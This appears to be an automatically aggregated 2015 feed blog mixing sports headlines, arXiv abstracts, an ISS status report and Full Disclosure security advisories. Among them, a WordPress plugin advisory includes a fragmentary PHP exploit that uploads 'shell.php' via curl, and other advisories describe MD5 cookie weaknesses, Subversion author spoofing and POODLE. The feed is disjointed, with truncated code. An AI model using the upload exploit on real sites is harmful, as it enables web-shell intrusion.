hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many of the web securities have been published here. Source Code: row_select_one("users","username='{$username}'"); if(!empty($extrow) && !empty($extrow['salt'])){ if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){ $row=$extrow; $new_row["userpass"]=$userpass_encrypt; $new_row["salt"]=""; $db->row_update("users",$new_row,"id={$extrow['id']}"); } } } ?> Source Code From: http://ift.tt/1Qs7B73 We can see that "userpass" stored in cookie was encrypted using "$userpass" user password directly. And there is no "HttpOnly" attribute at all. Since md5 is used for the encryption, it is easy for hackers to break the encrypted message. "The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia) *References:* http://ift.tt/1FbWNOx http://ift.tt/1Qs7B75 http://ift.tt/1FbWNOz http://ift.tt/1Qs7B77 http://ift.tt/1FbWNOC http://ift.tt/1Qs7E2X http://ift.tt/1FbWNOF http://ift.tt/1J8YP6L http://ift.tt/1FbWPWI http://ift.tt/1FbWNOJ

Source: Gmail -> IFTTT-> Blogger

[FD] SAP Security Notes June 2015

[FD] Apache vulnerability program faulting module ntdll.dll

Subversion HTTP servers allow spoofing svn:author property values for new revisions. Summary: ======== Subversion's mod_dav_svn server allows setting arbitrary svn:author property values when committing new revisions. This can be accomplished using a specially crafted sequence of requests. An evil-doer can fake svn:author values on his commits. However, as authorization rules are applied to the evil-doer's true username, forged svn:author values can only happen on commits that touch the paths the evil-doer has write access to. Doing so does not grant any additional access and does not circumvent the standard Apache authentication or authorization mechanisms. Still, an ability to spoof svn:author property values can impact data integrity in environments that rely on these values. There are no known instances of the problem being exploited in the wild, but an exploit has been tested. Known vulnerable: ================= Subversion HTTPD servers 1.5.0 through 1.7.19 (inclusive) Subversion HTTPD servers 1.8.0 through 1.8.11 (inclusive) Known fixed: ============ Subversion 1.7.20 Subversion 1.8.13 svnserve (any version) is not vulnerable Subversion 1.8.12 was not publicly released. Details: ======== The Subversion http://-based protocol used for communicating with a Subversion mod_dav_svn server has two versions, v1 and v2. The v2 protocol was added in Subversion 1.7.0, but the server allows using both protocol versions for compatibility reasons. When a commit happens, the client sends a sequence of requests (POST, PUT, MERGE, etc.) that depend on the negotiated protocol version. Usually, a server uses the name of the authenticated user as the svn:author value for a new revision. However, with a specially handcrafted v1 request sequence, a client can instruct the server to use the svn:author property that she/he provided. In this case, the server will use an arbitrary value coming from the client instead of the svn:author value originating from the authentication mechanism. Severity: ========= CVSSv2 Base Score: 3.5 CVSSv2 Base Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N We consider this to be a medium risk vulnerability. An attacker needs to have commit access to the repository to exploit the vulnerability. The ability to spoof svn:author property values can impact data integrity in environments that expect the values to denote the actual commit author. The real ID of the author could still be determined using server access logs. However, it is also possible that a spoofed change could go in unnoticed. Subversion's repository hooks might see the real ID of the author or the forged value, depending on the hook type and the hook contents: - A start-commit hook will see the real username in the USER argument - A start-commit hook will see the real username when performing 'svnlook propget --revprop -t TXN_NAME' - A pre-commit hook will see the forged username when performing 'svnlook propget --revprop -t TXN_NAME' - A post-commit hook will see the forged username when performing 'svnlook propget --revprop -r REV' Unfortunately, no special configuration is required and all mod_dav_svn servers are vulnerable. Recommendations: ================ We recommend all users to upgrade to Subversion 1.8.13. Users of Subversion 1.7.x or 1.8.x who are unable to upgrade may apply the included patch. New Subversion packages can be found at: http://ift.tt/PiZBag No workaround is available. References: =========== CVE-2015-0251 (Subversion) Reported by: ============ Bruno Luiz, d4t Patches: ======== Patch against 1.7.19: [[[ Index: subversion/mod_dav_svn/deadprops.c ===================================================================

Source: Gmail -> IFTTT-> Blogger

Future of 2016 Centennial Copa America to be discussed

SANTIAGO, Chile (AP) The treasurer of the governing body of South American football says the future of next year's centennial Copa America will be debated in the next few days.

from FOX Sports Digital http://ift.tt/1S8Fvvb
via IFTTT

Judge orders Chuck Blazer plea agreement unsealed

NEW YORK (AP) A judge has ordered federal prosecutors to unseal the plea agreement between former FIFA executive committee member Chuck Blazer and the U.S. government.

from FOX Sports Digital http://ift.tt/1I7pE8T
via IFTTT

Paraguay's Senate votes to end soccer confederation immunity

ASUNCION, Paraguay (AP) Paraguay's Senate voted Thursday to repeal a law giving immunity to the headquarters of South America's soccer confederation, the latest fallout from a sweeping U.S. investigation into an alleged bribery scheme in FIFA.

from FOX Sports Digital http://ift.tt/1I7pE8S
via IFTTT

[FD] [KIS-2015-03] Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability

-------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Anonymous on Twitter: "UK schools are using spyware to monitor students' ideology. #Anonymous ...

#Anonymous ... 0racle alex bugosi OlgaMaria Carmen Fatema Abdullah Renata D'Ávila InvasionGod Anonymous anonymousKOREA Anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/LatestAnonNews/status/608818803414212609&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNH9usqe8Rj8zC47NR1cHCzMEJb57A
via IFTTT

[FD] [KIS-2015-02] Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities

------------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] [KIS-2015-01] Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability

---------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Orioles: SP Miguel Gonzalez (groin) placed on 15-day DL; P Mike Wright (2.96 ERA in 4 starts) recalled from Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Zimbabwe team misses flight amid payment dispute

HARARE, Zimbabwe (AP) Zimbabwe has missed its flight for a 2017 African Cup of Nations qualifier in Malawi because of a dispute with the national federation over unpaid bonuses and allowances.

from FOX Sports Digital http://ift.tt/1TemN6F
via IFTTT

Argentines wanted in FIFA case ask to remain free

BUENOS AIRES, Argentina (AP)

from FOX Sports Digital http://ift.tt/1GhvlDf
via IFTTT

Paraguay's Senate votes to repeal CONMEBOL immunity

ASUNCION, Paraguay (AP) Paraguay's Senate has voted to repeal a law giving immunity to the headquarters of South America's soccer confederation.

from FOX Sports Digital http://ift.tt/1TemKbf
via IFTTT

15 arrested in fixing probe led by anti-Mafia authorities

CATANZARO, Italy (AP) Fifteen people have been arrested as part of a match-fixing inquiry led by anti-Mafia prosecutors in the southern town of Catanzaro.

from FOX Sports Digital http://ift.tt/1Gw89CD
via IFTTT

Bursaspor out of Europa League after appeal to CAS rejected

LAUSANNE, Switzerland (AP) Turkish club Bursaspor has been excluded from the Europa League next season after failing in its appeal against a one-year ban from UEFA for breaking the governing body's financial fair play rules.

from FOX Sports Digital http://ift.tt/1FbqPC6
via IFTTT

Daniel Alves called up for Brazil's Copa America squad

SAO PAULO (AP) Barcelona right back Daniel Alves has been added to Brazil's Copa America squad.

from FOX Sports Digital http://ift.tt/1B5v0Vh
via IFTTT

At Copa America, Neymar gets new chance to lead Brazil

SAO PAULO (AP) An injury robbed Neymar of a chance to help Brazil win its home World Cup. Almost a year later, the youngster is back with another opportunity to show he can lead the national team to glory.

from FOX Sports Digital http://ift.tt/1GvE1ac
via IFTTT

FIFA's top spokesman leaves job, Blatter urged to do same

GENEVA (AP) FIFA's top spokesman left his job Thursday, hours after Sepp Blatter was urged to do the same by the European Parliament.

from FOX Sports Digital http://ift.tt/1QOTaoK
via IFTTT

Jose Mourinho banned from driving for 6 months for speeding

LONDON (AP) A British court has banned Chelsea manager Jose Mourinho from driving for six months after he was caught speeding.

from FOX Sports Digital http://ift.tt/1Msbra4
via IFTTT

ISS Daily Summary Report – 06/10/15

Change of Command Ceremony: In preparation for 41S crew departure tomorrow, Virts handed over command of the ISS to Padalka this morning. During the event, all crew members discussed with Houston and Russian Flight Control Teams their roles and responsibilities for the timeframe between this event and the departure of Soyuz. Human Research Program (HRP) Operations: Kelly, Cristoforetti, and Kornienko performed a suite of HRP activities today.  Kelly and Cristoforetti each collected saliva and urine samples and inserted in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for Microbiome, Salivary Markers.  Kelly also collected samples for Twins Study, Biochemical Profile, and Cardio Ox.  Kelly and Kornienko performed their Fine Motor Skills (FMS) and Reaction Self-Test (RST) activities. The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time). Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays. Twins Study is an integrated compilation of ten different studies led by multiple PI’s at multiple centers.  The studies take advantage of a very unique opportunity to look at the effects of space travel on identical twins, one of whom experiences space travel for one year; the other mains earth-bound for that same year.  The study looks at changes in the human body in the fields of genetics, psychology, physiology, microbiology, and immunology. Cardio Ox determines whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Crew members provide blood and urine samples to assess biomarkers before launch, three sessions while in space, and again post-flight. Ultrasound scans of the carotid and brachial arteries will be obtained at the same time points, as well as through 5 years after landing as an indicator of cardiovascular health. Fine Motor Skills addresses how fine motor performance in microgravity trend/vary over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trend/vary before and after gravitational transitions, including the periods of early flight adaptation, and very early/near immediate post-flight periods. Reaction Self-Test is a portable, five-minute task that enables astronauts to monitor the daily effects of fatigue on performance while in space. Sleep restrictions and residual effects from sleep medications, slam shifts that change the sleep/wake cycle, and effects from spacewalks can cause fatigue and degrade astronaut performance. Periodically during the mission, and in association with major events, an astronaut performs a reaction-time test on a computer to measure changes in responses. Crew Quarters (CQ) Starboard Cleaning: In preparation for his departure from the ISS, Virts cleaned his CQ including intake and exhaust ducts, fans and airflow sensors. Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Saliva Sample Collection HRF Sample Collection and Stowage Prep Self-Reaction Test. Reaction Time Test (morning) HRF – Sample MELFI Insertion HRF Urine Sample Collection TWIN – Urine Sample Collection HRF – Sample MELFI Insertion WRM – Potable bus sample  ТК 715 Return Stowage / r/g 8970 NAPOR-miniRSA. Cleaning БЗУ-М vents / r/g 9058 Analysis of SM Atmosphere for Freon Using Freon Leak Analyzer/Detector (ФИТ) FINEMOTR – Experiment Ops STRUKTURA. Deactivation of crystallization process r/g 9055 STRUKTURA.  Photography during mixing ops / r/g 9056 TWIN – Urine Sample Collection BIOSIGNAL. Hardware Transfer to ТК 715 r/g 9054 Transfer of LUCH-2 kit to Soyuz 715 / r/g 9055 Fine Motor Skills – Experiment Ops HRF – Sample MELFI Insertion SEISMOPROGNOZ. Repeat 06/08/15 Data Downlink. / r/g 9059 Data Prep for Return Connecting Sony DC-V700 charger to b/u LIV Video power feeder.  / r/g 9061 HRF Urine Sample Collection Crew Quarter Cleaning ПС1, ПС2 Dust Collector Filter Replacement in FBG HRF – Sample MELFI Insertion TWIN – Blood Collection Hardware Setup TWIN – Urine Sample Collection Comm Check and Ops from ТК 715 via RGS HRF – Sample MELFI Insertion Soyuz 715 P/L Container Transfer Operations Report r/g 8970 WRS – Recycle Tank Fill Download Pille Dosimeter Readings / r/g 9044 HRF Urine Sample Collection HRF – Sample MELFI Insertion HRF- Blood collection setup Personal Medication Stowage URAGAN. Observation and photography using Photo Equipment / r/g 9057 TWIN – Urine Sample Collection IMS Delta File Prep HRF – Sample MELFI Insertion Signing ISS RS Handover Protocol / r/g 9040 CONTENT. Experiment Ops / r/g 9053 PAO Event Health Maintenance System Med Pack Prelanding-Medication HRF Urine Sample Collection HRF – Sample MELFI Insertion Change of Command Ceremony CQ Audio Cable Configuration Self-Reaction Test. Reaction Time Test (evening) ТПК 715 [СА] cool down prior to descent  VLV КР1  “ХСА MIN”, VLV КР2 ХСА MAX Completed Task List Items None Ground Activities All activities were completed schedule unless otherwise noted. CQ cleaning  Three-Day Look Ahead: Thursday, 06/11: 41S undock/landing, Sprint Portable Pulmonary Function setup, Twin Studies Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry Saturday, 06/13: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1FLpFPs
via IFTTT

Blatter spokesman De Gregorio to leave FIFA immediately

ZURICH (AP) FIFA says its director of public affairs Walter De Gregorio, who is closely tied to President Sepp Blatter, is leaving his job.

from FOX Sports Digital http://ift.tt/1B51ezQ
via IFTTT

European lawmakers urge FIFA president Blatter to go now

STRASBOURG, France (AP) European lawmakers have urged FIFA President Sepp Blatter to step down immediately, and for an interim leader to be appointed.

from FOX Sports Digital http://ift.tt/1MrXCIN
via IFTTT

South Korea forward Kang tests positive for steroid

SEOUL, South Korea (AP) K-league officials say South Korea forward Kang Soo-il has failed a doping test.

from FOX Sports Digital http://ift.tt/1B4S2LV
via IFTTT

NSFW illustrations of anonymous sexual encounters

A sneak peek of the Anonymous Sex Journal's collaboration with Riposte Magazine.

from Google Alert - anonymous http://ift.tt/1FazViA
via IFTTT

Verratti leaves Italy's squad with injured calf

FLORENCE, Italy (AP) Midfielder Marco Verratti has left Italy's training camp with a left calf injury a day before a key match against Croatia.

from FOX Sports Digital http://ift.tt/1Ksip06
via IFTTT

Germany, Portugal, Brazil reach quarterfinals at U20 WCup

WELLINGTON, New Zealand (AP) Former champions Germany, Portugal and Brazil earned places in the quarterfinals of the Under-20 World Cup on Thursday, bringing more familiar names to a last-eight lineup that includes a number of upstarts.

from FOX Sports Digital http://ift.tt/1FKZI2p
via IFTTT

Lyon midfielder Clement Grenier signs new 2-year deal

LYON, France (AP) Lyon midfielder Clement Grenier has signed a new two-year contract until 2018.

from FOX Sports Digital http://ift.tt/1e58lhq
via IFTTT

Wednesday, June 10, 2015

Brazil beats Honduras 1-0 in final warmup for Copa America

PORTO ALEGRE, Brazil (AP) Brazil was boosted by the return of Neymar and defeated Honduras 1-0 on Wednesday in its final warmup before traveling to Chile for the Copa America.

from FOX Sports Digital http://ift.tt/1dy4aKl
via IFTTT

Australia players, football federation in pay dispute

SYDNEY (AP) A union representing Socceroos players says Football Federation Australia has not handed over match payments and bonuses owed to the national team and has filed a grievance with a disputes arbitrator.

from FOX Sports Digital http://ift.tt/1KXBVzP
via IFTTT

I have a new follower on Twitter


Tony Zayas
Proud Father and Husband. Chicago sports, UFC and Iowa Hawkeye football enthusiast. Marketer, Strategist & Social media guy @Proforma
Cleveland, OH
http://t.co/6oaAybm9nS
Following: 3720 - Followers: 5071

June 10, 2015 at 10:54PM via Twitter http://twitter.com/TonyZayas

Orioles Highlight: 3 great defensive plays lead to fourth-straight victory over Red Sox, 5-2; Wei-Yin Chen 2 ER, 5.0 IP (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Cordny Nederkoorn
Enthusiastic Blogger / Journalist | #softwaretesting | #SaaS | #security | #privacy | #identitymanagement

http://t.co/jyMhDHCqEk
Following: 15678 - Followers: 16686

June 10, 2015 at 09:52PM via Twitter http://twitter.com/TestingSaaS

Former Brazil star Zico wants to run for FIFA president

RIO DE JANEIRO (AP) Former Brazil star Zico wants to run for the presidency of FIFA, even though he believes the odds are stacked against him being elected.

from FOX Sports Digital http://ift.tt/1Qq1mAF
via IFTTT

On-the-Job Learning with Bayesian Decision Theory. (arXiv:1506.03140v1 [cs.AI])

How can we deploy a high-accuracy system starting with zero training examples? We consider an "on-the-job" setting, where as inputs arrive, we use crowdsourcing to resolve uncertainty where needed and output our prediction when confident. As the model improves over time, the reliance on crowdsourcing queries decreases. We cast our setting as a stochastic game based on Bayesian decision theory, which allows us to balance latency, cost, and accuracy objectives in a principled way. Computing the optimal policy is intractable, so we develop an approximation based on Monte Carlo Tree Search. We tested our approach across three datasets---named-entity recognition, sentiment classification, and image classification. On the NER task we obtained a 6--7 fold reduction in cost compared to full human annotation. We also achieve a 17% F$_1$ improvement over having a single human label the whole set, and a 28% F$_1$ improvement over online learning.



from cs.AI updates on arXiv.org http://ift.tt/1TcnYUd
via IFTTT

Teaching Machines to Read and Comprehend. (arXiv:1506.03340v1 [cs.CL])

Teaching machines to read natural language documents remains an elusive challenge. Machine reading systems can be tested on their ability to answer questions posed on the contents of documents that they have seen, but until now large scale training and test datasets have been missing for this type of evaluation. In this work we define a new methodology that resolves this bottleneck and provides large scale supervised reading comprehension data. This allows us to develop a class of attention based deep neural networks that learn to read real documents and answer complex questions with minimal prior knowledge of language structure.



from cs.AI updates on arXiv.org http://ift.tt/1F9CCkt
via IFTTT

Contextual Bandits with Global Constraints and Objective. (arXiv:1506.03374v1 [cs.LG])

We consider the contextual version of a multi-armed bandit problem with global convex constraints and concave objective function. In each round, the outcome of pulling an arm is a context-dependent vector, and the global constraints require the average of these vectors to lie in a certain convex set. The objective is a concave function of this average vector. The learning agent competes with an arbitrary set of context-dependent policies. This problem is a common generalization of problems considered by Badanidiyuru et al. (2014) and Agrawal and Devanur (2014), with important applications. We give computationally efficient algorithms with near-optimal regret, generalizing the approach of Agarwal et al. (2014) for the non-constrained version of the problem. For the special case of budget constraints our regret bounds match those of Badanidiyuru et al. (2014), answering their main open question of obtaining a computationally efficient algorithm.



from cs.AI updates on arXiv.org http://ift.tt/1S61oeE
via IFTTT

On the Prior Sensitivity of Thompson Sampling. (arXiv:1506.03378v1 [cs.LG])

The empirically successful Thompson Sampling algorithm for stochastic bandits has drawn much interest in understanding its theoretical properties. One important benefit of the algorithm is that it allows domain knowledge to be conveniently encoded as a prior distribution to balance exploration and exploitation more effectively. While it is generally believed that the algorithm's regret is low (high) when the prior is good (bad), little is known about the exact dependence. In this paper, we fully characterize the algorithm's worst-case dependence of regret on the choice of prior, focusing on a special yet representative case. These results also provide insights into the general sensitivity of the algorithm to the choice of priors. In particular, with $p$ being the prior probability mass of the true reward-generating model, we prove $O(\sqrt{T/p})$ and $O(\sqrt{(1-p)T})$ regret upper bounds for the bad- and good-prior cases, respectively, as well as \emph{matching} lower bounds. Our proofs rely on the discovery of a fundamental property of Thompson Sampling and make heavy use of martingale theory, both of which appear novel in the literature, to the best of our knowledge.



from cs.AI updates on arXiv.org http://ift.tt/1e47sG4
via IFTTT

The Online Discovery Problem and Its Application to Lifelong Reinforcement Learning. (arXiv:1506.03379v1 [cs.LG])

Transferring knowledge across a sequence of related tasks is an important challenge in reinforcement learning. Despite much encouraging empirical evidence that shows benefits of transfer, there has been very little theoretical analysis. In this paper, we study a class of lifelong reinforcement-learning problems: the agent solves a sequence of tasks modeled as finite Markov decision processes (MDPs), each of which is from a finite set of MDPs with the same state/action spaces and different transition/reward functions. Inspired by the need for cross-task exploration in lifelong learning, we formulate a novel online discovery problem and give an optimal learning algorithm to solve it. Such results allow us to develop a new lifelong reinforcement-learning algorithm, whose overall sample complexity in a sequence of tasks is much smaller than that of single-task learning, with high probability, even if the sequence of tasks is generated by an adversary. Benefits of the algorithm are demonstrated in a simulated problem.



from cs.AI updates on arXiv.org http://ift.tt/1F9CEsw
via IFTTT

Fast Online Clustering with Randomized Skeleton Sets. (arXiv:1506.03425v1 [cs.AI])

We present a new fast online clustering algorithm that reliably recovers arbitrary-shaped data clusters in high throughout data streams. Unlike the existing state-of-the-art online clustering methods based on k-means or k-medoid, it does not make any restrictive generative assumptions. In addition, in contrast to existing nonparametric clustering techniques such as DBScan or DenStream, it gives provable theoretical guarantees. To achieve fast clustering, we propose to represent each cluster by a skeleton set which is updated continuously as new data is seen. A skeleton set consists of weighted samples from the data where weights encode local densities. The size of each skeleton set is adapted according to the cluster geometry. The proposed technique automatically detects the number of clusters and is robust to outliers. The algorithm works for the infinite data stream where more than one pass over the data is not feasible. We provide theoretical guarantees on the quality of the clustering and also demonstrate its advantage over the existing state-of-the-art on several datasets.



from cs.AI updates on arXiv.org http://ift.tt/1F9CEsu
via IFTTT

Dynamic Consistency of Conditional Simple Temporal Networks via Mean Payoff Games: a Singly-Exponential Time DC-Checking. (arXiv:1505.00828v3 [cs.DS] UPDATED)

Conditional Simple Temporal Network (CSTN) is a constraint-based graph-formalism for conditional temporal planning. It offers a more flexible formalism than the equivalent CSTP model of Tsamardinos, Vidal and Pollack, from which it was derived mainly as a sound formalization. Three notions of consistency arise for CSTNs and CSTPs: weak, strong, and dynamic. Dynamic consistency is the most interesting notion, but it is also the most challenging and it was conjectured to be hard to assess. Tsamardinos, Vidal and Pollack gave a doubly-exponential time algorithm for deciding whether a CSTN is dynamically-consistent and to produce, in the positive case, a dynamic execution strategy of exponential size. In the present work we offer a proof that deciding whether a CSTN is dynamically-consistent is coNP-hard and provide the first singly-exponential time algorithm for this problem, also producing a dynamic execution strategy whenever the input CSTN is dynamically-consistent. The algorithm is based on a novel connection with Mean Payoff Games, a family of two-player combinatorial games on graphs well known for having applications in model-checking and formal verification. The presentation of such connection is mediated by the Hyper Temporal Network model, a tractable generalization of Simple Temporal Networks whose consistency checking is equivalent to determining Mean Payoff Games. In order to analyze the algorithm we introduce a refined notion of dynamic-consistency, named \epsilon-dynamic-consistency, and present a sharp lower bounding analysis on the critical value of the reaction time \hat{\varepsilon} where the CSTN transits from being, to not being, dynamically-consistent. The proof technique introduced in this analysis of \hat{\varepsilon} is applicable more in general when dealing with linear difference constraints which include strict inequalities.



from cs.AI updates on arXiv.org http://ift.tt/1DRnNT1
via IFTTT

Orioles: A red-hot bullpen (3 R last 18.1 IP) looks to stop Red Sox 4th straight time in Baltimore, 7 ET ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: A red-hot bullpen (3 R last 18.1 IP) looks to stop Red Sox 4th straight time in Baltimore, 7 ET ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Red Sox: Rick Porcello looks to build on last outing (8 IP, 2 R, 0 BBs vs. Twins) at Orioles; 7 pm ET on ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Orioles look to make it 4 wins in a row at home against the Red Sox (David Ortiz benched); 7 pm ET ESPN/WatchESPN (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

PicResize.com (@picresize) favorited one of your Tweets!

@mistermcguire: [FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms Wordpress plugin   PicResize.com favorited your Tweet. View   Patrick McGuire @mistermcguire =   [FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin ift.tt/1MpBxdJ   Settings | Help | Opt-out | Download app Twitter, Inc. 1355 Market Street, Suite 900 San Francisco, CA 94103

Source: Gmail -> IFTTT-> Blogger

Wood scores late to give US a 2-1 win over Germany

COLOGNE, Germany (AP) Substitute Bobby Wood scored in the 87th minute to give the United States a 2-1 victory over World Cup champion Germany in a friendly on Wednesday.

from FOX Sports Digital http://ift.tt/1B7dyiU
via IFTTT

Former Brazil star Zico running for FIFA president

RIO DE JANEIRO (AP) Former Brazil star Zico says he wants to run for the presidency of FIFA.

from FOX Sports Digital http://ift.tt/1MpzxSP
via IFTTT

Wood's 87th-minute goal lifts US to 2-1 win at Germany

COLOGNE, Germany (AP) Bobby Wood scored a late goal for the second time in six days to give the United States its first victory at a European soccer power, lifting the Americans to a 2-1 win at World Cup champion Germany in an exhibition game Wednesday.

from FOX Sports Digital http://ift.tt/1Qpy2ua
via IFTTT

[FD] 2 vulns 1 line in RNCryptor (PHP) + Call to Action

[FD] Authentication Bypass in Pandora FMS

================================================================ Authentication Bypass in Pandora FMS ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin

Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-07 Download Site: http://ift.tt/1F8mVtO Vendor: Waters Edge Web Design and NetherWorks LLC Vendor Notified: 2015-06-08 Advisory: http://ift.tt/1QoCBox Vendor Contact: plugins@wordpress.org Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: 1 $max_file_size ){ 15 $msg = "File Size is too big."; 16 $error_flag = true; 17 } 18 $extension = strtolower(end(explode('.', $image_file['name']))); 19 $aa_options = get_option('gf_aa_options'); 20 $supported_files = $aa_options['supported_file_format']; 21 $supported_files = strtolower($supported_files); 22 if(!$error_flag && $supported_files != '' ){ 23 $supported_files = explode (',', $supported_files); 24 if(!in_array($extension, $supported_files)){ 25 $msg = "No Supported file."; 26 $error_flag = true; 27 } 28 } 29 if(!$error_flag){ 30 $wp_upload_dir = wp_upload_dir(); 31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ 32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); 33 } 34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; 35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; 36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ]; 37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ 38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me']; 39 } 40 } 41 $return_obj = array('status' => 'success', 'message' => $file_url); 42 echo json_encode($return_obj); 43 } 44 ?> CVEID: 2015-4455 OSVDB: Exploit Code: • 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "
"; • echo $result; • echo "
"; • ?>

Source: Gmail -> IFTTT-> Blogger

Trinidad AG: Gov't feared ex-FIFA VP Warner a flight risk

PORT-OF-SPAIN, Trinidad (AP) Trinidad Attorney General Garvin Nicholas said Wednesday that officials feared former FIFA Vice President Jack Warner would flee the island after facing U.S. federal corruption charges, but they're now confident he'll stay in the country.

from FOX Sports Digital http://ift.tt/1F9ir62
via IFTTT

Argentine willing to be extradited to US in FIFA case

BUENOS AIRES, Argentina (AP) An Argentine businessman who was indicted by U.S. authorities in the FIFA corruption case says he is willing to be extradited to the U.S. from Italy, where he is being held.

from FOX Sports Digital http://ift.tt/1IGEh8X
via IFTTT

[FD] This POODLE Bites: Exploiting The SSL 3.0 Fallback

Introduction SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards­compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. The POODLE Attack To work with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client; if this handshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0. Recommendations The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability. Impact The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.). Solution There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the rerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades: - OpenSSL 1.0.1 users should upgrade to 1.0.1j. - OpenSSL 1.0.0 users should upgrade to 1.0.0o. - OpenSSL 